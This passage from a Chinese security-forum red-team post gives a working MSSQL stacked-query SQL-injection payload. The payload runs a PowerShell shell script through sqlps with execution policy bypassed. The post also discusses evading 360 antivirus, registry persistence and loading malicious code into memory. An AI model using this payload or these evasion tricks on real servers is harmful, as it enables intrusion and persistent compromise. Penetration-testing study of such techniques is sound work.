iMesFV/8Me61LFi3qlWiNIcR05Hp4jX4/2bOwLur/4lvDn0LALwIw4kvXbp0wf+bOaNdbNFoOkYAsI5iB0EQBEEQhFpszS1hSVgxdZzP7aLXG71mJGHHLpw/j4eGDyfxhSAIgiAIgugwtEsIMgA4euwnuLm7YfCggfDy8oS7uzuf+yVqWAQein4A48c9iuCgQLi5Mefc3Nyg0WigNxig0bjh2PETVrZajsPlQMQL4k32Po+mOUEIqcPOFRtQFj4dq2UeEswme6cRXzoRkTOysPqFcJStz8BO8zG87KZP+L3ogzocLpfn+yj9cgdq/ccjnubYIn0DAjB/7p/RpUsXfHPoW+R/+B+R+DJ/7p/RNyDA1WYSBEEQBEEQJjAnvqgWZsyEG5Me415crlDhcQDQG/SoPXsWQ4IHoGsXH3XtEwRBEB0Yyv9CEMTNQ7t5wLS2tsBgMMDf3w/Nzc3Q6w1wc9PAzc0Nvx9+L34//F4AQOWRo3hn1b9gMHBPhQPdu3XF5SvX0NraYlPbdXV1APxNnRWEjvJn/l/HHM9JTgEQbvSSKNuAueuNuWL6PJaGvz7K1lu2A9vrwpH0mnoPCGmoMpEXB++9MB6/rNwALvWHqE2h/Xw14SKvjtL3U5BTNx5JUd8h58s6Qcgu1lsH8usYryHm6PaVKdgOf4EXhbQ9uU2m23QSEeMR75+B7V+WYxzXjmSujDbUWTXHItv7xOLx8B3IKSlH7aNCkY0R+vo8Fs4eMz22SnDjJQxtJl8b0+UXmrHV5ByiAG9mFSJg+kpMDeUuPI/D/9mE7654oUsXb3h5eaF3RBxiB/fgqz5/4jBOt/ZDyF0tONPYAm8vL3h5+eC23r3Qxd1Ex8zAiTCMJ8whABoXiS/
|
|||
|
|
<pre blockindex=63><code class="hljs language-php">http:<span class=hljs-comment>//192.168.159.128/index.aspx?user_id=1;</span>
|
|||
|
|
<span class=hljs-keyword>declare</span> @o <span class=hljs-keyword>int</span>;
|
|||
|
|
exec sp_oacreate <span class=hljs-string>'wscript.shell'</span>,@o out;
|
|||
|
|
exec sp_oamethod @o,<span class=hljs-string>'run'</span>,<span class=hljs-literal>null</span>,<span class=hljs-string>'sqlps -ExecutionPolicy bypass -File c:\windows\temp\shell.ps1'</span>;
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=64>这样就上线了,但是到这里还是不能执行命令的,因为本质还是sqlserver下的进程</p>
|
|||
|
|
<p blockindex=65>需要用migrate注入到别的进程内就可以执行命令了</p>
|
|||
|
|
<h1 blockindex=66>0x04 总结</h1>
|
|||
|
|
<p blockindex=67>sqlps直接执行是会被360拦截的,但是由sqlserver创建后执行就不拦截了</p>
|
|||
|
|
<p blockindex=68>mssql是可以直接修改注册表启动项的,当然sqlps修改注册表也是不会被拦截的,这可能就是有签名的强大吧</p>
|
|||
|
|
<p blockindex=69>因为2008操作空间有点小,如果有.net4.0可以用dotnet,csi这些直接将恶意代码加载进内存</p>
|
|||
|
|
<p blockindex=70>总的来说需要一个有数字签名的程序可以直接加载进内存,如果有数字签名的程序可以直接执行dll,要么存在dll劫持的漏洞,也可以达到上线的目的的</p></div></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="post-opt mt-30">
|
|||
|
|
<ul class="list-inline text-muted">
|
|||
|
|
<li>
|
|||
|
|
<i class="fa fa-clock-o"></i>
|
|||
|
|
发表于 2022-04-22 09:34:01
|
|||
|
|
</li>
|
|||
|
|
<li>阅读 ( 6384 )</li>
|
|||
|
|
<li>分类:<a href=https://forum.butian.net/community/Red_team target=_blank rel="noopenner noreferrer">内网渗透</a>
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="text-center mt-30 mb-20">
|
|||
|
|
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=1498 data-support_num=4> 4 推荐</button>
|
|||
|
|
|
|||
|
|
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=1498> 收藏</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-answers mt-15">
|
|||
|
|
<h2 class="h4 post-title">0 条评论</h2>
|
|||
|
|
<div class=comment>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-comment-form row mt-20 mb-20">
|
|||
|
|
<div class=col-md-12>
|
|||
|
|
请先 <a class=a_unLogin href=https://forum.butian.net/login>登录</a> 后评论
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=text-center>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer id=footer>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class=text-center>
|
|||
|
|
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
|
|||
|
|
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
|
|||
|
|
<a href=https://forum.butian.net/sitemap>sitemap</a>
|
|||
|
|
</div>
|
|||
|
|
<div class="copyright mt-10">
|
|||
|
|
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-1498 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span id=cnzz_stat_icon_1279782571></span>
|
|||
|
|
<div class="geetest_panel geetest_wind" style=display:none></div>
|